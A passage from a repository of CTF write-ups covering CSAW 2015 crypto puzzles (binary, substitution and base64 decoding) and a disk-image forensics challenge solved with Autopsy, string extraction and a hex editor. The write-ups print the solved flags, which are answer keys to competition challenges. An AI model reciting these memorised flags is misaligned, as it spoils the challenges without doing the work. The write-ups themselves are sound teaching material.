├── 2015 ├── CSAW-CTF │ ├── Crypto │ │ ├── notesy │ │ │ ├── Images │ │ │ │ ├── notesy.4chars.png │ │ │ │ ├── notesy.5chars.png │ │ │ │ ├── notesy.blank.png │ │ │ │ └── notesy.key.png │ │ │ └── Readme.md │ │ ├── ones_and_zer0es │ │ │ ├── Readme.md │ │ │ └── eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg │ │ ├── whiter0se │ │ │ ├── Readme.md │ │ │ ├── eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v │ │ │ └── quipquip.out.png │ │ └── zer0-day │ │ │ ├── Readme.md │ │ │ └── eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi │ ├── Forensics │ │ ├── Flash │ │ │ ├── Flash option 1.md │ │ │ ├── Flash option 2.md │ │ │ ├── Flash option 3.md │ │ │ ├── Flash option 4.md │ │ │ ├── Images │ │ │ │ ├── CTF1.jpg │ │ │ │ ├── CTF10.jpg │ │ │ │ ├── CTF11.jpg │ │ │ │ ├── CTF12.jpg │ │ │ │ ├── CTF13.jpg │ │ │ │ ├── CTF14.jpg │ │ │ │ ├── CTF15.jpg │ │ │ │ ├── CTF16.jpg │ │ │ │ ├── CTF16A.jpg │ │ │ │ ├── CTF16B.jpg │ │ │ │ ├── CTF17.jpg │ │ │ │ ├── CTF17A.jpg │ │ │ │ ├── CTF17B.jpg │ │ │ │ ├── CTF18.jpg │ │ │ │ ├── CTF19.jpg │ │ │ │ ├── CTF2.jpg │ │ │ │ ├── CTF20.jpg │ │ │ │ ├── CTF3.jpg │ │ │ │ ├── CTF31.jpg │ │ │ │ ├── CTF32.jpg │ │ │ │ ├── CTF33.jpg │ │ │ │ ├── CTF34.jpg │ │ │ │ ├── CTF35.jpg │ │ │ │ ├── CTF4.jpg │ │ │ │ ├── CTF41.jpg │ │ │ │ ├── CTF41A.jpg │ │ │ │ ├── CTF42.jpg │ │ │ │ ├── CTF42A.jpg │ │ │ │ ├── CTF43.jpg │ │ │ │ ├── CTF43A.jpg │ │ │ │ ├── CTF5.jpg │ │ │ │ ├── CTF6.jpg │ │ │ │ ├── CTF7.jpg │ │ │ │ ├── CTF8.jpg │ │ │ │ └── CTF9.jpg │ │ │ └── Readme.md │ │ ├── Keep-Calm-and-CTF │ │ │ ├── Images │ │ │ │ ├── CTF2.jpg │ │ │ │ ├── CTF3.jpg │ │ │ │ └── img.jpg │ │ │ └── Readme.md │ │ └── airport │ │ │ ├── Images │ │ │ ├── 1.png │ │ │ ├── 2.png │ │ │ ├── 3.png │ │ │ ├── 4.png │ │ │ └── steghide.jpg │ │ │ ├── Readme.md │ │ │ └── airport_26321e6eac7a7490e527cbe27ceb68c1.zip │ ├── Recon │ │ ├── Alexander-Taylor │ │ │ ├── Images │ │ │ │ ├── 1.png │ │ │ │ ├── 2.png │ │ │ │ ├── 3.png │ │ │ │ ├── 4.png │ │ │ │ ├── 5.png │ │ │ │ ├── decode.png │ │ │ │ ├── enigma.png │ │ │ │ ├── js.png │ │ │ │ ├── linkedin.png │ │ │ │ ├── wcsc.png │ │ │ │ ├── yoshi_forum.png │ │ │ │ └── yoshi_text.png │ │ │ └── Readme.md │ │ ├── Eric-Liang │ │ │ ├── Images │ │ │ │ ├── CSAW.png │ │ │ │ ├── brooklyn.png │ │ │ │ ├── competitors.png │ │ │ │ ├── flag.png │ │ │ │ ├── logo.png │ │ │ │ ├── team_website.png │ │ │ │ └── teams.png │ │ │ └── Readme.md │ │ └── Julian-Cohen │ │ │ ├── Images │ │ │ └── google.png │ │ │ └── Readme.md │ ├── Trivia │ │ └── Readme.md │ └── Web │ │ ├── K_-Stairs │ │ ├── Images │ │ │ ├── bid.png │ │ │ ├── compass.png │ │ │ ├── flag.png │ │ │ ├── hidden.png │ │ │ ├── home.png │ │ │ ├── noop.png │ │ │ ├── register.png │ │ │ ├── stairs.png │ │ │ ├── tokens.png │ │ │ └── tokens_after.png │ │ └── Readme.md │ │ └── Lawn-Care-Simulator │ │ ├── Images │ │ ├── achievement.png │ │ ├── empty.png │ │ ├── flag.png │ │ ├── grass.png │ │ ├── intro.png │ │ └── username.png │ │ └── Readme.md └── PoliCTF │ ├── Grab-Bag │ └── Hard-Interview │ │ ├── IP.tiff │ │ ├── Readme.md │ │ ├── hint.tiff │ │ └── user.tiff │ ├── Reversing │ └── Crack-Me-If-You-Can │ │ ├── Readme.md │ │ ├── crack-me-if-you-can_d4e396383e3f64ec7698efaf42f7f32b.tar.gz.gpg │ │ ├── crackme.py │ │ └── luyten.tiff │ └── Web │ ├── John-the-Referee │ ├── 9.jpg │ ├── Readme.md │ ├── flag.JPG │ ├── main.JPG │ ├── normal.JPG │ └── or_logic.JPG │ └── John-the-Traveller │ ├── 3.jpg │ ├── Crop.tiff │ ├── QR.tiff │ ├── Readme.md │ ├── Traveller.tiff │ ├── Venice.tiff │ ├── block.png │ ├── flag.tiff │ └── px.tiff ├── 2016 ├── BostonKeyParty │ ├── Crypto │ │ └── des-ofb │ │ │ ├── Images │ │ │ └── 601px-OFB_decryption.png │ │ │ ├── Readme.md │ │ │ └── ciphertext │ ├── Misc │ │ └── lily │ │ │ ├── Images │ │ │ └── lily.png │ │ │ ├── Readme.md │ │ │ └── lily.flac │ └── Web │ │ └── Good Morning │ │ ├── Images │ │ ├── monty.png │ │ ├── sjis-kgo.png │ │ └── sjis-request.png │ │ ├── Readme.md │ │ └── release │ │ ├── ganbatte.py │ │ ├── requirements.txt │ │ └── static │ │ ├── favicon.png │ │ ├── ganbatte-mayoi.png │ │ ├── index.html │ │ ├── questions.js │ │ └── style.css └── IceCTF │ └── Stage_2 │ └── DearDiary │ ├── Readme.md │ └── deardiary ├── Misc ├── Defcamp CTF 2015 │ └── Misc │ │ └── She said it doesn't matter │ │ ├── Images │ │ ├── flag.png │ │ ├── flag_color.png │ │ ├── m100.png │ │ ├── m101.png │ │ ├── m102.png │ │ └── m102.png.0005.IDAT │ │ └── Readme.md ├── Hack.lu-CTF-2015 │ └── Web │ │ └── Module Loader │ │ ├── Images │ │ ├── flag.png │ │ ├── hidden.png │ │ ├── htaccess.png │ │ ├── lfi.png │ │ ├── main.png │ │ ├── modules.png │ │ └── notthateasy.png │ │ └── Readme.md └── OverTheWire │ ├── Behemoth │ ├── Behemoth0 │ │ ├── Readme.md │ │ └── behemoth0 │ ├── Behemoth1 │ │ ├── Readme.md │ │ └── behemoth1 │ ├── Behemoth2 │ │ ├── Readme.md │ │ └── behemoth2 │ └── Behemoth3 │ │ ├── Readme.md │ │ └── behemoth3 │ └── Narnia │ ├── Naria0 │ ├── Readme.md │ ├── narnia0 │ └── narnia0.c │ ├── Narnia1 │ ├── Readme.md │ ├── narnia1 │ └── narnia1.c │ ├── Narnia2 │ ├── Readme.md │ ├── narnia2 │ └── narnia2.c │ ├── Narnia3 │ ├── Readme.md │ ├── narnia3 │ └── narnia3.c │ ├── Narnia4 │ ├── Readme.md │ ├── narnia4 │ └── narnia4.c │ ├── Narnia5 │ ├── Readme.md │ ├── narnia5 │ └── narnia5.c │ ├── Narnia6 │ ├── Readme.md │ ├── narnia6 │ └── narnia6.c │ ├── Narnia7 │ ├── Readme.md │ ├── narnia7 │ └── narnia7.c │ └── Narnia8 │ ├── Readme.md │ ├── narnia8 │ └── narnia8.c └── README.md /2015/CSAW-CTF/Crypto/notesy/Images/notesy.4chars.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Crypto/notesy/Images/notesy.4chars.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/notesy/Images/notesy.5chars.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Crypto/notesy/Images/notesy.5chars.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/notesy/Images/notesy.blank.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Crypto/notesy/Images/notesy.blank.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/notesy/Images/notesy.key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Crypto/notesy/Images/notesy.key.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/notesy/Readme.md: -------------------------------------------------------------------------------- 1 | #notesy 2 | 3 | **Category:** Crypto 4 | **Points:** 100 5 | **Description:** 6 | 7 | http://54.152.6.70/ 8 | 9 | The flag is not in the flag{} format. 10 | 11 | HINT: If you have the ability to encrypt and decrypt, what do you think the flag is? 12 | 13 | HINT: https://www.youtube.com/watch?v=68BjP5f0ccE 14 | 15 | 16 | ##Write-up## 17 | 18 | The link is for a website that has a single text box saying: "Give me like a note dude." If you start typing a red box appears below saying "Your note isn't long enough so it's not security" 19 | 20 | ![notesy blank] 21 | (./Images/notesy.blank.png) 22 | 23 | ![notesy 4 characters] 24 | (./Images/notesy.4chars.png) 25 | 26 | After typing at least 5 characters text shows up below the text box. A single character shows up for every character entered, so after entering 5 characters, 5 show up below. Adding a 6th makes an additional charcter show up. After doing some testing I decided position didn't matter and it was another single substitution cipher. 27 | 28 | ![notesy 5 characters] 29 | (./Images/notesy.5chars.png) 30 | 31 | I typed the entire alphabet in to get the key. I thought the flag would be giving some encoded text than translated to something. I tried encoding "flags" and "Your note isn't long enough so it's not security" but neither completed the challenge. The hints weren't there at the time, but its pretty obvious based on them you should put the whole key in. I put the key in and completed the challenge. 32 | 33 | ![notesy key] 34 | (./Images/notesy.key.png) 35 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/ones_and_zer0es/Readme.md: -------------------------------------------------------------------------------- 1 | #ones_and_zer0es 2 | 3 | **Category:** Crypto 4 | **Points:** 50 5 | **Description:** NA 6 | 7 | [eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg](eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg) 8 | 9 | ##Write-up## 10 | 11 | This file is ascii text: 12 | 13 | >``` 14 | root@ctf:~/Downloads/CTF# file eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg 15 | eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg: ASCII text, with very long lines 16 | root@ctf:~/Downloads/CTF# cat eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg 17 | 01100110011011000110000101110100011110110101000001100101011011110111000001101100011001010010000001100001011011000111011101100001011110010111001100100000011011010110000101101011011001010010000001110100011010000110010100100000011000100110010101110011011101000010000001100101011110000111000001101100011011110110100101110100011100110010111001111101001000000100100100100111011101100110010100100000011011100110010101110110011001010111001000100000011001100110111101110101011011100110010000100000011010010111010000100000011010000110000101110010011001000010000001110100011011110010000001101000011000010110001101101011001000000110110101101111011100110111010000100000011100000110010101101111011100000110110001100101001011100010000001001001011001100010000001111001011011110111010100100000011011000110100101110011011101000110010101101110001000000111010001101111001000000111010001101000011001010110110100101100001000000111011101100001011101000110001101101000001000000111010001101000011001010110110100101100001000000111010001101000011001010110100101110010001000000111011001110101011011000110111001100101011100100110000101100010011010010110110001101001011101000110100101100101011100110010000001100001011100100110010100100000011011000110100101101011011001010010000001100001001000000110111001100101011011110110111000100000011100110110100101100111011011100010000001110011011000110111001001100101011101110110010101100100001000000110100101101110011101000110111100100000011101000110100001100101011010010111001000100000011010000110010101100001011001000111001100101110 18 | 19 | >``` 20 | 21 | The file contains binary text. There are serveral websites such as http://www.binaryhexconverter.com/binary-to-ascii-text-converter that can convert binary text to ascii. A better way though is to use python: 22 | 23 | >```python 24 | #!/usr/bin/python 25 | import sys 26 | import binascii 27 | for file in sys.argv[1:]: 28 | # open file 29 | with open (file, "r") as myfile: 30 | data=myfile.read().replace('\n', '') 31 | print "### ", file , " convert binary to ascii ###" 32 | n = int(data, 2) 33 | print binascii.unhexlify('%x' % n) 34 | >``` 35 | 36 | 37 | >``` 38 | root@ctf:~/Downloads/CTF# ./binary.2.ascii.py eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg 39 | ### eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg convert binary to ascii ### 40 | flat{People always make the best exploits.} I've never found it hard to hack most people. If you listen to them, watch them, their vulnerabilities are like a neon sign screwed into their heads. 41 | >``` 42 | 43 | Also notice the flag has a typo as "flat". 44 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/ones_and_zer0es/eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg: -------------------------------------------------------------------------------- 1 | 01100110011011000110000101110100011110110101000001100101011011110111000001101100011001010010000001100001011011000111011101100001011110010111001100100000011011010110000101101011011001010010000001110100011010000110010100100000011000100110010101110011011101000010000001100101011110000111000001101100011011110110100101110100011100110010111001111101001000000100100100100111011101100110010100100000011011100110010101110110011001010111001000100000011001100110111101110101011011100110010000100000011010010111010000100000011010000110000101110010011001000010000001110100011011110010000001101000011000010110001101101011001000000110110101101111011100110111010000100000011100000110010101101111011100000110110001100101001011100010000001001001011001100010000001111001011011110111010100100000011011000110100101110011011101000110010101101110001000000111010001101111001000000111010001101000011001010110110100101100001000000111011101100001011101000110001101101000001000000111010001101000011001010110110100101100001000000111010001101000011001010110100101110010001000000111011001110101011011000110111001100101011100100110000101100010011010010110110001101001011101000110100101100101011100110010000001100001011100100110010100100000011011000110100101101011011001010010000001100001001000000110111001100101011011110110111000100000011100110110100101100111011011100010000001110011011000110111001001100101011101110110010101100100001000000110100101101110011101000110111100100000011101000110100001100101011010010111001000100000011010000110010101100001011001000111001100101110 2 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/whiter0se/Readme.md: -------------------------------------------------------------------------------- 1 | #whiter0se 2 | 3 | **Category:** Crypto 4 | **Points:** 50 5 | **Description:** Note: The flag is the entire thing decrypted 6 | 7 | [eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v](eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v) 8 | 9 | ##Write-up 10 | 11 | Again, the file is ascii text: 12 | 13 | >``` 14 | root@ctf:~/Downloads/CTF# file eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v 15 | eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v: ASCII text 16 | root@ctf:~/Downloads/CTF# cat eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v 17 | EOY XF, AY VMU M UKFNY TOY YF UFWHYKAXZ EAZZHN. UFWHYKAXZ ZNMXPHN. UFWHYKAXZ EHMOYACOI. VH'JH EHHX CFTOUHP FX VKMY'U AX CNFXY FC OU. EOY VH KMJHX'Y EHHX IFFQAXZ MY VKMY'U MEFJH OU. 18 | >``` 19 | 20 | This looks like a single substitution cipher. Let's try rot13 with a perl oneliner: 21 | 22 | >``` 23 | root@ctf:~/Downloads/CTF# perl -lpe 'y/A-Za-z/N-ZA-Mn-za-m/' eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v 24 | RBL KS, NL IZH Z HXSAL GBL LS HSJULXNKM RNMMUA. HSJULXNKM MAZKCUA. HSJULXNKM RUZBLNPBV. IU'WU RUUK PSGBHUC SK IXZL'H NK PASKL SP BH. RBL IU XZWUK'L RUUK VSSDNKM ZL IXZL'H ZRSWU BH. 25 | >``` 26 | 27 | Well, that's unfortunate. There's probably a better automated way to do it but I just put that command 26 times in a shell script and edited it for all possible values (rot1-25). I'll spare you the agony, it didn't work. 28 | 29 | So now we're dealing with a single substitution cipher that isn't based on rotating the charcters. To the internet! http://quipqiup.com/ 30 | 31 | ![quipquip ouput] 32 | (./quipquip.out.png) 33 | 34 | 35 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/whiter0se/eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v: -------------------------------------------------------------------------------- 1 | EOY XF, AY VMU M UKFNY TOY YF UFWHYKAXZ EAZZHN. UFWHYKAXZ ZNMXPHN. UFWHYKAXZ EHMOYACOI. VH'JH EHHX CFTOUHP FX VKMY'U AX CNFXY FC OU. EOY VH KMJHX'Y EHHX IFFQAXZ MY VKMY'U MEFJH OU. 2 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/whiter0se/quipquip.out.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Crypto/whiter0se/quipquip.out.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/zer0-day/Readme.md: -------------------------------------------------------------------------------- 1 | #zer0-day 2 | 3 | **Category:** Crypto 4 | **Points:** 50 5 | **Description:** NA 6 | 7 | [eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi](eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi) 8 | 9 | ##Write-up## 10 | 11 | The eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi file is actually ascii text 12 | 13 | >``` 14 | root@ctf:~/Downloads/CTF# file eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi 15 | eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi: ASCII text, with very long lines 16 | root@ctf:~/Downloads/CTF# cat eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi 17 | RXZpbCBDb3JwLCB3ZSBoYXZlIGRlbGl2ZXJlZCBvbiBvdXIgcHJvbWlzZSBhcyBleHBlY3RlZC4g\nVGhlIHBlb3BsZSBvZiB0aGUgd29ybGQgd2hvIGhhdmUgYmVlbiBlbnNsYXZlZCBieSB5b3UgaGF2\nZSBiZWVuIGZyZWVkLiBZb3VyIGZpbmFuY2lhbCBkYXRhIGhhcyBiZWVuIGRlc3Ryb3llZC4gQW55\nIGF0dGVtcHRzIHRvIHNhbHZhZ2UgaXQgd2lsbCBiZSB1dHRlcmx5IGZ1dGlsZS4gRmFjZSBpdDog\neW91IGhhdmUgYmVlbiBvd25lZC4gV2UgYXQgZnNvY2lldHkgd2lsbCBzbWlsZSBhcyB3ZSB3YXRj\naCB5b3UgYW5kIHlvdXIgZGFyayBzb3VscyBkaWUuIFRoYXQgbWVhbnMgYW55IG1vbmV5IHlvdSBv\nd2UgdGhlc2UgcGlncyBoYXMgYmVlbiBmb3JnaXZlbiBieSB1cywgeW91ciBmcmllbmRzIGF0IGZz\nb2NpZXR5LiBUaGUgbWFya2V0J3Mgb3BlbmluZyBiZWxsIHRoaXMgbW9ybmluZyB3aWxsIGJlIHRo\nZSBmaW5hbCBkZWF0aCBrbmVsbCBvZiBFdmlsIENvcnAuIFdlIGhvcGUgYXMgYSBuZXcgc29jaWV0\neSByaXNlcyBmcm9tIHRoZSBhc2hlcyB0aGF0IHlvdSB3aWxsIGZvcmdlIGEgYmV0dGVyIHdvcmxk\nLiBBIHdvcmxkIHRoYXQgdmFsdWVzIHRoZSBmcmVlIHBlb3BsZSwgYSB3b3JsZCB3aGVyZSBncmVl\nZCBpcyBub3QgZW5jb3VyYWdlZCwgYSB3b3JsZCB0aGF0IGJlbG9uZ3MgdG8gdXMgYWdhaW4sIGEg\nd29ybGQgY2hhbmdlZCBmb3JldmVyLiBBbmQgd2hpbGUgeW91IGRvIHRoYXQsIHJlbWVtYmVyIHRv\nIHJlcGVhdCB0aGVzZSB3b3JkczogImZsYWd7V2UgYXJlIGZzb2NpZXR5LCB3ZSBhcmUgZmluYWxs\neSBmcmVlLCB3ZSBhcmUgZmluYWxseSBhd2FrZSF9Ig== 18 | >``` 19 | 20 | This looks to be base64 encoded but it doesn't decode cleanly: 21 | 22 | >``` 23 | root@ctf:~/Downloads/CTF# base64 -d eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi 24 | Evil Corp, we have delivered on our promise as expected. base64: invalid input 25 | >``` 26 | 27 | That's because of the newline \n characters. You can remove them with sed 28 | 29 | >``` 30 | root@ctf:~/Downloads/CTF# sed -i 's/\\n//g' eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi 31 | root@ctf:~/Downloads/CTF# base64 -d eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi 32 | Evil Corp, we have delivered on our promise as expected. The people of the world who have been enslaved by you have been freed. Your financial data has been destroyed. Any attempts to salvage it will be utterly futile. Face it: you have been owned. We at fsociety will smile as we watch you and your dark souls die. That means any money you owe these pigs has been forgiven by us, your friends at fsociety. The market's opening bell this morning will be the final death knell of Evil Corp. We hope as a new society rises from the ashes that you will forge a better world. A world that values the free people, a world where greed is not encouraged, a world that belongs to us again, a world changed forever. And while you do that, remember to repeat these words: "flag{We are fsociety, we are finally free, we are finally awake!}" 33 | >``` 34 | 35 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/zer0-day/eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi: -------------------------------------------------------------------------------- 1 | RXZpbCBDb3JwLCB3ZSBoYXZlIGRlbGl2ZXJlZCBvbiBvdXIgcHJvbWlzZSBhcyBleHBlY3RlZC4g\nVGhlIHBlb3BsZSBvZiB0aGUgd29ybGQgd2hvIGhhdmUgYmVlbiBlbnNsYXZlZCBieSB5b3UgaGF2\nZSBiZWVuIGZyZWVkLiBZb3VyIGZpbmFuY2lhbCBkYXRhIGhhcyBiZWVuIGRlc3Ryb3llZC4gQW55\nIGF0dGVtcHRzIHRvIHNhbHZhZ2UgaXQgd2lsbCBiZSB1dHRlcmx5IGZ1dGlsZS4gRmFjZSBpdDog\neW91IGhhdmUgYmVlbiBvd25lZC4gV2UgYXQgZnNvY2lldHkgd2lsbCBzbWlsZSBhcyB3ZSB3YXRj\naCB5b3UgYW5kIHlvdXIgZGFyayBzb3VscyBkaWUuIFRoYXQgbWVhbnMgYW55IG1vbmV5IHlvdSBv\nd2UgdGhlc2UgcGlncyBoYXMgYmVlbiBmb3JnaXZlbiBieSB1cywgeW91ciBmcmllbmRzIGF0IGZz\nb2NpZXR5LiBUaGUgbWFya2V0J3Mgb3BlbmluZyBiZWxsIHRoaXMgbW9ybmluZyB3aWxsIGJlIHRo\nZSBmaW5hbCBkZWF0aCBrbmVsbCBvZiBFdmlsIENvcnAuIFdlIGhvcGUgYXMgYSBuZXcgc29jaWV0\neSByaXNlcyBmcm9tIHRoZSBhc2hlcyB0aGF0IHlvdSB3aWxsIGZvcmdlIGEgYmV0dGVyIHdvcmxk\nLiBBIHdvcmxkIHRoYXQgdmFsdWVzIHRoZSBmcmVlIHBlb3BsZSwgYSB3b3JsZCB3aGVyZSBncmVl\nZCBpcyBub3QgZW5jb3VyYWdlZCwgYSB3b3JsZCB0aGF0IGJlbG9uZ3MgdG8gdXMgYWdhaW4sIGEg\nd29ybGQgY2hhbmdlZCBmb3JldmVyLiBBbmQgd2hpbGUgeW91IGRvIHRoYXQsIHJlbWVtYmVyIHRv\nIHJlcGVhdCB0aGVzZSB3b3JkczogImZsYWd7V2UgYXJlIGZzb2NpZXR5LCB3ZSBhcmUgZmluYWxs\neSBmcmVlLCB3ZSBhcmUgZmluYWxseSBhd2FrZSF9Ig== 2 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Flash option 1.md: -------------------------------------------------------------------------------- 1 | #Flash 2 | 3 | **Category:** Forensics 4 | **Points:** 100 5 | **Description:** 6 | 7 | We were able to grab an image of a harddrive. Find out what's on it. 8 | 9 | ##Write-up 10 | Based on the information provided it appears that we will be dealing with an [image](https://en.wikipedia.org/wiki/Disk_image) of a flash hard drive so I am expecting that I will be using forensic software to analyze the file. 11 | 12 | My first step was to download the image file and examine it with standard forensic software. The image file contained approximately 190 files and folders which included several hidden folder/file types. Since we are looking for the 'flag' I created a search operation to be run against all files (including hidden files) to search for the term ‘flag‘. This search returned 397 hits from within 43 files so I knew I needed to narrow the results. 13 | 14 | I created a second search operation to also be run against all files (including hidden files) this time searching for the term ‘flag{‘. This search resulted in one hit within one file and the flag was immediately located in the following hidden file ‘Disk Image\.10\.hidden’ 15 | 16 | The flag recovered to solve this CTF is ```flag{b3l0w_th3_r4dar}``` 17 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Flash option 2.md: -------------------------------------------------------------------------------- 1 | #Flash 2 | 3 | **Category:** Forensics 4 | **Points:** 100 5 | **Description:** 6 | 7 | We were able to grab an image of a hard drive. Find out what's on it. 8 | 9 | ##Write-up 10 | Based on the information provided it appears that we will be dealing with an [image](https://en.wikipedia.org/wiki/Disk_image) of a flash hard drive so I am expecting that I will be using forensic software to analyze the file. 11 | 12 | My first step was to download the image file and examine it with the [SANS Investigative Forensic Toolkit] (http://digital-forensics.sans.org/community/downloads). The SANS Investigative Forensic Toolkit (SIFT) is a virtual workstation created for incident response and digital forensics use and made available to the whole community as a public service. 13 | ![CTF Image](./Images/CTF1.jpg) 14 | 15 | The first step is to start the forensic application Autopsy installed on the SIFT. 16 | ![CTF Image](./Images/CTF2.jpg) 17 | 18 | Next we want to open a browser on the SIFT with the following URL ```http://localhost:9999/autopsy``` which will take us to the Autopsy main page. 19 | ![CTF Image](./Images/CTF3.jpg) 20 | 21 | Let's click ```New Case``` and populate the fields to create a new Autopsy case. Click ```New Case``` again to complete this step. 22 | ![CTF Image](./Images/CTF4.jpg) 23 | 24 | If this is the first time you have used Autopsy on this system your screen will look like this. Simply leave the name to 'Hidden' and click ```Add Host``` 25 | ![CTF Image](./Images/CTF5.jpg) 26 | 27 | If you have run Autopsy on this system before simply click ```Add Host```. 28 | ![CTF Image](./Images/CTF6.jpg) 29 | 30 | Populate the information and click ```Add Host``` again to complete this step. 31 | ![CTF Image](./Images/CTF7.jpg) 32 | 33 | Click ```Add Image``` 34 | ![CTF Image](./Images/CTF8.jpg) 35 | 36 | Click ```Add Image File``` 37 | ![CTF Image](./Images/CTF9.jpg) 38 | 39 | Enter the full location of the flash image file in the location field and click ```Next``` 40 | ![CTF Image](./Images/CTF10.jpg) 41 | 42 | Leave the settings as they appear - Disk Image, Volume System Type (disk image only): dos. Click ```Ok``` 43 | ![CTF Image](./Images/CTF11.jpg) 44 | 45 | Here we don't need to make any changes, just click ```Add``` 46 | ![CTF Image](./Images/CTF12.jpg) 47 | 48 | Just click ```Ok``` 49 | ![CTF Image](./Images/CTF13.jpg) 50 | 51 | On this screen we are going to click ```Analyze```. 52 | ![CTF Image](./Images/CTF14.jpg) 53 | 54 | We want to start with a keyword search so we click on the ```Keyword Search``` button 55 | ![CTF Image](./Images/CTF15.jpg) 56 | 57 | We leave the default options and enter our search term of 'flag' and click ```Search``` 58 | ![CTF Image](./Images/CTF16B.jpg) 59 | 60 | We can see that there were quite a number of search results returned (397 hits for the term 'flag'). Let's click on ```Keyword search``` again and see if we can narrow our results buy changing our search parameters. 61 | ![CTF Image](./Images/CTF17B.jpg) 62 | 63 | Let's enter the search term 'flag{', hit ```Keyword search```, and compare the results to the previous search. 64 | ![CTF Image](./Images/CTF18.jpg) 65 | 66 | Now we can see that our results are much smaller. We can see that this time we only have one hit listed. 67 | ![CTF Image](./Images/CTF19.jpg) 68 | 69 | If we click on the link ```Ascii``` we can clearly see the flag - ```flag{b3l0w_th3_r4dar]``` 70 | ![CTF Image](./Images/CTF20.jpg) 71 | 72 | The flag recovered to solve this CTF is ```flag{b3l0w_th3_r4dar}``` 73 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Flash option 3.md: -------------------------------------------------------------------------------- 1 | #Flash 2 | 3 | **Category:** Forensics 4 | **Points:** 100 5 | **Description:** 6 | 7 | We were able to grab an image of a hard drive. Find out what's on it. 8 | 9 | ##Write-up 10 | Based on the information provided it appears that we will be dealing with an [image](https://en.wikipedia.org/wiki/Disk_image) of a flash hard drive so I am expecting that I will be using forensic software to analyze the file. 11 | 12 | My first step was to download the image file and examine it with the [SANS Investigative Forensic Toolkit] (http://digital-forensics.sans.org/community/downloads). The SANS Investigative Forensic Toolkit (SIFT) is a virtual workstation created for incident response and digital forensics use and made available to the whole community as a public service. 13 | ![CTF Image](./Images/CTF1.jpg) 14 | 15 | Open a terminal type the following command ```srch_string -t d flash.img>output.asc ``` for your your image file. 16 | ![CTF Image](./Images/CTF31.jpg) 17 | 18 | Now use the vi editor command ```vi output.asc``` to open the file output.asc. 19 | ![CTF Image](./Images/CTF32.jpg) 20 | 21 | Viewing the file output.asc we see the strings extracted from the image file: 22 | ![CTF Image](./Images/CTF33.jpg) 23 | 24 | Use the vi command ```/``` to search for the following string ```flag{```: 25 | ![CTF Image](./Images/CTF34.jpg) 26 | 27 | We are able to quickly locate the flag in this image file: 28 | ![CTF Image](./Images/CTF35.jpg) 29 | 30 | The flag recovered to solve this CTF is ```flag{b3l0w_th3_r4dar}``` 31 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Flash option 4.md: -------------------------------------------------------------------------------- 1 | #Flash 2 | 3 | **Category:** Forensics 4 | **Points:** 100 5 | **Description:** 6 | 7 | We were able to grab an image of a harddrive. Find out what's on it. 8 | 9 | ##Write-up 10 | 11 | Based on the information provided it appears that we will be dealing with an [image](https://en.wikipedia.org/wiki/Disk_image) of a flash hard drive so I am expecting that I will be using forensic software to analyze the file. 12 | 13 | I never know how well data is going to be hidden in a file so I open this file with [Hex Edit](http://www.hexedit.com) and take a quick look. 14 | ![CTF Image](./Images/CTF41A.jpg)] 15 | 16 | I perform a simple search for the term ```flag``` and I get numerous hits. 17 | ![CTF 